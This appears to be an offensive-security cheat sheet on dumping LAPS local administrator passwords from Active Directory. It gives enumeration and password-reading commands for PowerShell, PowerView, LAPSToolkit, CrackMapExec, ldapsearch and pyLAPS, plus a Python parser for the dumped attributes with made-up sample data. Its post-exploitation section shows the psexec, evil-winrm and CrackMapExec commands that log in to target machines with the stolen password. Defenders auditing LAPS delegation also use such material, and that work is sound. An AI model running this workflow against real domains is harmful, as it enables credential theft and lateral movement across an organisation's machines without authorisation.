Overview

LAPS (Local Administrator Password Solution) rotates the local administrator password on domain-joined machines and stores it in Active Directory: the cleartext password lives in the computer object's ms-Mcs-AdmPwd attribute and the scheduled rotation time in ms-Mcs-AdmPwdExpirationTime. The computer account writes its own password (SELF has write access); reading it is gated by ms-Mcs-AdmPwd being a confidential attribute, so a principal needs the Control Access (extended) right on the computer object, not plain read. Domain Admins hold that right by default, along with any group delegated via Set-AdmPwdReadPasswordPermission. If your account has it, you get the local admin password in cleartext.

Check if LAPS is Installed

On Target

reg query "HKLM\SOFTWARE\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul
Get-ChildItem 'C:\Program Files\LAPS\CSE\AdmPwd.dll' -ErrorAction SilentlyContinue
dir "C:\Program Files\LAPS" 2>nul

Check AD Schema

Get-ADObject "CN=ms-Mcs-AdmPwd,CN=Schema,CN=Configuration,DC=domain,DC=local" -ErrorAction SilentlyContinue

Read LAPS Password

PowerShell (AD Module)

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select Name, 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'

Because ms-Mcs-AdmPwd is confidential, an account without the Control Access right gets it back empty rather than an error. An empty result therefore does not mean LAPS is absent: ms-Mcs-AdmPwdExpirationTime is not confidential and is readable by ordinary domain users by default, so any computer with that attribute populated is LAPS-managed even if you cannot read its password yet.

Specific Computer

Get-ADComputer TARGET-PC -Properties ms-Mcs-AdmPwd | Select Name, 'ms-Mcs-AdmPwd'

PowerView

Get-DomainComputer -Properties samaccountname,ms-mcs-admpwd | Where-Object { $_.'ms-mcs-admpwd' -ne $null }

LAPS Toolkit

https://github.com/leoloobeek/LAPSToolkit
Import-Module .\LAPSToolkit.ps1

# Who can read LAPS passwords (delegated groups and extended-rights holders)
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights

# LAPS-managed computers, with password and expiry where your account can read them
Get-LAPSComputers

From Linux (Remote)

CrackMapExec

crackmapexec ldap DC_IP -u user -p password --module laps

The module binds to LDAP with the supplied account and prints only the computers whose password that account is allowed to read. CrackMapExec itself is no longer maintained; its fork NetExec (nxc) keeps the same laps module with the same syntax.

ldapsearch

ldapsearch -x -H ldap://DC_IP -D "user@domain.local" -w "password" -b "DC=domain,DC=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd ms-MCS-AdmPwdExpirationTime sAMAccountName

-x is a simple bind, so over ldap:// the password crosses the wire in cleartext; prefer -H ldaps://DC_IP or add -ZZ for StartTLS, and -W instead of -w "password" keeps it out of the process list. Since ms-MCS-AdmPwd is confidential, the (ms-MCS-AdmPwd=*) filter only matches computers whose password your bind account may read; to inventory every LAPS-managed computer regardless of rights, drop that filter and request ms-MCS-AdmPwdExpirationTime, which is readable by default.

Impacket

impacket-GetADUsers -all domain.local/user:password -dc-ip DC_IP

Impacket has no LAPS reader: GetADUsers only enumerates domain user accounts. It is useful as a first step (pick accounts and groups to test for delegated ms-Mcs-AdmPwd read rights), not as a way to read the password; use ldapsearch or pyLAPS for that.

pyLAPS

https://github.com/p0dalirius/pyLAPS

python3 pyLAPS.py -u user -p password -d domain.local --dc-ip DC_IP

LAPS v2 (Windows LAPS)

Windows LAPS (the newer, built-in version) uses its own attribute set. By default the password is stored in cleartext as a JSON blob in msLAPS-Password, of the form {"n":"Administrator","t":"<hex FILETIME of the last set>","p":"<password>"}, with the rotation time in msLAPS-PasswordExpirationTime. Only when the policy enables password encryption does it move to msLAPS-EncryptedPassword (plus msLAPS-EncryptedPasswordHistory), protected with DPAPI-NG so that only the configured authorized decryptor (Domain Admins unless changed) can recover it. Read access is gated the same way as the legacy attribute: msLAPS-Password is confidential, so the Control Access right is required.

Check

Get-ADComputer -Filter * -Properties msLAPS-Password,msLAPS-EncryptedPassword,msLAPS-PasswordExpirationTime | Where-Object { $_.'msLAPS-Password' -ne $null -or $_.'msLAPS-EncryptedPassword' -ne $null } | Select Name, 'msLAPS-Password', 'msLAPS-PasswordExpirationTime'

Read with Authorized Account

Get-LapsADPassword -Identity TARGET-PC -AsPlainText

Get-LapsADPassword is in the LAPS PowerShell module that ships with Windows LAPS-capable builds. Run it as a principal holding the read right; for encrypted passwords the caller must also be (or be a member of) the authorized decryptor, since the cmdlet decrypts msLAPS-EncryptedPassword on your behalf. Without -AsPlainText the password comes back as a SecureString; -IncludeHistory also returns previous passwords.
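Once the attributes are in hand (from ldapsearch, as in the Linux section above, or from either of the AD-module queries), they still need decoding: the expiration times are Windows FILETIMEs and the Windows LAPS value is a JSON blob. The following Python is an added example, not code from this page or from any of the tools listed; it parses constructed ldapsearch output covering a legacy ms-Mcs-AdmPwd entry, a Windows LAPS msLAPS-Password entry, an msLAPS-EncryptedPassword entry and a computer that exposes only an expiration time, converts the timestamps, and flags expired values. Hostnames, passwords and timestamps are made up; the JSON field names n/t/p follow Microsoft's documented Windows LAPS format, and the LDIF reader is deliberately minimal (enough for ldapsearch output, not a full RFC 2849 implementation).

```python
import base64
import json
from datetime import datetime, timedelta, timezone

# FILETIME = 100-ns ticks since 1601-01-01 UTC: the encoding of the *ExpirationTime
# attributes and of the "t" field inside msLAPS-Password.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ticks):
    return _FILETIME_EPOCH + timedelta(microseconds=ticks // 10)

def parse_ldif(text):
    """Minimal reader for ldapsearch output: unfolds continuation lines, decodes
    'attr:: <base64>' values, drops comments and the trailing search/result block,
    and lower-cases attribute names (LDAP is case-insensitive)."""
    lines = []
    for line in text.splitlines():
        if line.startswith(" ") and lines:      # folded line: join without the leading space
            lines[-1] += line[1:]
        else:
            lines.append(line)
    entries, current = [], {}
    for line in lines + [""]:                   # sentinel blank flushes the last entry
        if not line.strip():
            if "dn" in current:
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):               # base64: binary or LDIF-unsafe characters
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(key.lower(), []).append(value)
    return entries

def extract_laps(entries, now):
    """One record per computer with any LAPS footprint. A password means the bind
    account holds the confidential-attribute read right; an expiration time alone
    means LAPS is deployed but the password is not readable to you."""
    records = []
    for e in entries:
        sam = e.get("samaccountname", [""])[0]
        rec = {"host": sam.rstrip("$") or e["dn"][0], "scheme": None, "account": None,
               "password": None, "set_at": None, "expires": None}
        if "ms-mcs-admpwd" in e:                # legacy LAPS: cleartext; AD does not record
            rec.update(scheme="legacy", password=e["ms-mcs-admpwd"][0])  # the account name
        elif "mslaps-password" in e:            # Windows LAPS: cleartext JSON blob
            blob = json.loads(e["mslaps-password"][0])   # n = account, t = hex FILETIME, p = password
            rec.update(scheme="windows-laps", account=blob["n"], password=blob["p"],
                       set_at=filetime_to_datetime(int(blob["t"], 16)))
        elif "mslaps-encryptedpassword" in e:   # only the authorized decryptor can recover it
            rec["scheme"] = "windows-laps-encrypted"
        elif "ms-mcs-admpwdexpirationtime" in e or "mslaps-passwordexpirationtime" in e:
            rec["scheme"] = "managed-but-unreadable"
        else:
            continue
        for attr in ("ms-mcs-admpwdexpirationtime", "mslaps-passwordexpirationtime"):
            if attr in e:
                rec["expires"] = filetime_to_datetime(int(e[attr][0]))
        # after expiry the host rotates on its next LAPS cycle, so use a stale value quickly
        rec["expired"] = rec["expires"] is not None and rec["expires"] < now
        records.append(rec)
    return records

# Constructed sample in the shape of `ldapsearch -x` output; hosts, passwords and times are made up.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=WS01,OU=Workstations,DC=domain,DC=local
sAMAccountName: WS01$
ms-MCS-AdmPwd: Tr5!k9@Zq2mB#e
ms-MCS-AdmPwdExpirationTime: 133485408000000000

dn: CN=SRV02,OU=Servers,DC=domain,DC=local
sAMAccountName: SRV02$
msLAPS-Password: {"n":"Administrator","t":"1da24b27e254000","p":"Q7u$Vw2!
 pLm9&Xd"}
msLAPS-PasswordExpirationTime: 133512192000000000

dn: CN=FS03,OU=Servers,DC=domain,DC=local
sAMAccountName: FS03$
msLAPS-EncryptedPassword:: AQAAAA==

dn: CN=WS04,OU=Workstations,DC=domain,DC=local
sAMAccountName: WS04$
ms-MCS-AdmPwdExpirationTime: 133512192000000000

search: 2
result: 0 Success
"""
SAMPLE_NOW = datetime(2024, 1, 15, tzinfo=timezone.utc)

if __name__ == "__main__":
    for r in extract_laps(parse_ldif(SAMPLE_LDIF), SAMPLE_NOW):
        print(r)
```

Run it against real output by replacing SAMPLE_LDIF with the text ldapsearch wrote (drop the (ms-MCS-AdmPwd=*) filter and request the expiration-time attributes too if you want the managed-but-unreadable hosts listed). Legacy records carry no account name because AD never stores it; the managed account is the built-in Administrator unless the AdminAccountName policy renamed it, whereas Windows LAPS records it in the "n" field.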

Who Can Read LAPS?

Find Delegated Groups

Find-AdmPwdExtendedRights -Identity "OU=Workstations,DC=domain,DC=local"

Find-AdmPwdExtendedRights comes from Microsoft's AdmPwd.PS management module (LAPSToolkit ships a compatible reimplementation). For each computer container under the given identity it lists the principals holding extended rights on the computer objects, which is exactly who can read ms-Mcs-AdmPwd.

Check ACLs

# ObjectType is a GUID, so matching it against the attribute name never hits. Resolve the schemaIDGUID of ms-Mcs-AdmPwd and look for ACEs naming that GUID, for "all extended rights" (empty GUID + ExtendedRight) or for GenericAll.
$g = [guid]::new((Get-ADObject "CN=ms-Mcs-AdmPwd,CN=Schema,CN=Configuration,DC=domain,DC=local" -Properties schemaIDGUID).schemaIDGUID)
(Get-ACL "AD:CN=TARGET-PC,OU=Computers,DC=domain,DC=local").Access | Where-Object { $_.ObjectType -eq $g -or ($_.ObjectType -eq [guid]::Empty -and $_.ActiveDirectoryRights -match 'GenericAll|ExtendedRight') } | Select IdentityReference, ActiveDirectoryRights, ObjectType, IsInherited

Post-Exploitation

# The LAPS password belongs to a LOCAL account, so authenticate locally rather than as domain\Administrator.
# The managed account is the built-in Administrator unless the AdminAccountName policy (legacy LAPS) or the
# "n" field of msLAPS-Password (Windows LAPS) says otherwise.
crackmapexec smb TARGET -u Administrator -p 'LAPSPassword123' --local-auth
impacket-psexec Administrator:'LAPSPassword123'@TARGET
evil-winrm -i TARGET -u Administrator -p 'LAPSPassword123'

Quick Reference

Tool                   Where     Notes
PowerShell AD module   Target    Get-ADComputer
PowerView              Target    Get-DomainComputer
LAPSToolkit            Target    Find delegated groups, dump readable passwords
CrackMapExec           Attacker  --module laps
ldapsearch             Attacker  Direct LDAP query
pyLAPS                 Attacker  Standalone Python